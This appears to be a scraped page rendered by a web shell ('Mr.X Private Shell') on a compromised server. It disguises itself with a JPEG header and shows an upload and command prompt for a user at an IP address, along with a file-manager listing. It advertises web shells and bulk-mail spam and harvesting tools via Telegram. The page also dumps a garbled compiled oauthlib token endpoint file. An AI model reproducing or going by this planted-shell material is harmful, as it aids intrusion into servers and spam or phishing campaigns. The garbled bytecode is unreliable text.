����JFIF��������� Mr.X
  
  __  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

deexcl@216.73.217.71: ~ $
a

\��`��@sRdZddlZddlmZddlmZddlmZmZe�	e
�ZGdd�de�ZdS)	z�
oauthlib.oauth2.rfc6749
~~~~~~~~~~~~~~~~~~~~~~~

This module is an implementation of various logic needed
for consuming and providing OAuth 2.0 RFC6749.
�N)�Request)�utils�)�BaseEndpoint�catch_errors_and_unavailabilityc@sbeZdZdZdZdd�Zedd��Zedd��Zed	d
��Z	edd��Z
eddd��Zdd�Z
dS)�
TokenEndpointa�Token issuing endpoint.

    The token endpoint is used by the client to obtain an access token by
    presenting its authorization grant or refresh token.  The token
    endpoint is used with every authorization grant except for the
    implicit grant type (since an access token is issued directly).

    The means through which the client obtains the location of the token
    endpoint are beyond the scope of this specification, but the location
    is typically provided in the service documentation.

    The endpoint URI MAY include an "application/x-www-form-urlencoded"
    formatted (per `Appendix B`_) query component,
    which MUST be retained when adding additional query parameters.  The
    endpoint URI MUST NOT include a fragment component::

        https://example.com/path?query=component             # OK
        https://example.com/path?query=component#fragment    # Not OK

    Since requests to the token endpoint result in the transmission of
    clear-text credentials (in the HTTP request and response), the
    authorization server MUST require the use of TLS as described in
    Section 1.6 when sending requests to the token endpoint::

        # We will deny any request which URI schema is not with https

    The client MUST use the HTTP "POST" method when making access token
    requests::

        # HTTP method is currently not enforced

    Parameters sent without a value MUST be treated as if they were
    omitted from the request.  The authorization server MUST ignore
    unrecognized request parameters.  Request and response parameters
    MUST NOT be included more than once::

        # Delegated to each grant type.

    .. _`Appendix B`: https://tools.ietf.org/html/rfc6749#appendix-B
    )�POSTcCs t�|�||_||_||_dS�N)r�__init__�_grant_types�_default_token_type�_default_grant_type)�self�default_grant_type�default_token_type�grant_types�r�K/usr/lib/python3.9/site-packages/oauthlib/oauth2/rfc6749/endpoints/token.pyr
?s
zTokenEndpoint.__init__cCs|jSr	)r�rrrrrEszTokenEndpoint.grant_typescCs|jSr	)r
rrrrrIsz TokenEndpoint.default_grant_typecCs|j�|j�Sr	)r�getrrrrr�default_grant_type_handlerMsz(TokenEndpoint.default_grant_type_handlercCs|jSr	)rrrrrrQsz TokenEndpoint.default_token_typerNc
Csrt||||d�}|�|�t�|j�|_||_|r8||_|rB||_|j	�
|j|j�}	t�
d|j|	�|	�||j�S)z7Extract grant_type and route to the designated handler.)�http_method�body�headersz(Dispatching grant_type %s request to %r.)r�validate_token_requestrZ
scope_to_listZscopeZscopesZextra_credentialsZ
grant_type�claimsrrr�log�debug�create_token_responser)
rZurirrrZcredentialsZgrant_type_for_scoper�requestZgrant_type_handlerrrrrUs&�

���z#TokenEndpoint.create_token_responsecCs|�|�|�|�dSr	)Z_raise_on_bad_methodZ_raise_on_bad_post_request)rrrrrrus
z$TokenEndpoint.validate_token_request)rNNNNN)�__name__�
__module__�__qualname__�__doc__Zvalid_request_methodsr
�propertyrrrrrrrrrrrrs")



�r)
r#ZloggingZoauthlib.commonrZoauthlib.oauth2.rfc6749r�baserrZ	getLoggerr rrrrrr�<module>s


Filemanager

Name Type Size Permission Actions
__init__.cpython-39.opt-1.pyc File 825 B 0644
__init__.cpython-39.pyc File 825 B 0644
authorization.cpython-39.opt-1.pyc File 4.5 KB 0644
authorization.cpython-39.pyc File 4.5 KB 0644
base.cpython-39.opt-1.pyc File 4.31 KB 0644
base.cpython-39.pyc File 4.31 KB 0644
introspect.cpython-39.opt-1.pyc File 4.96 KB 0644
introspect.cpython-39.pyc File 4.96 KB 0644
metadata.cpython-39.opt-1.pyc File 8.54 KB 0644
metadata.cpython-39.pyc File 8.58 KB 0644
pre_configured.cpython-39.opt-1.pyc File 8.07 KB 0644
pre_configured.cpython-39.pyc File 8.07 KB 0644
resource.cpython-39.opt-1.pyc File 3.77 KB 0644
resource.cpython-39.pyc File 3.77 KB 0644
revocation.cpython-39.opt-1.pyc File 5.02 KB 0644
revocation.cpython-39.pyc File 5.02 KB 0644
token.cpython-39.opt-1.pyc File 4.21 KB 0644
token.cpython-39.pyc File 4.21 KB 0644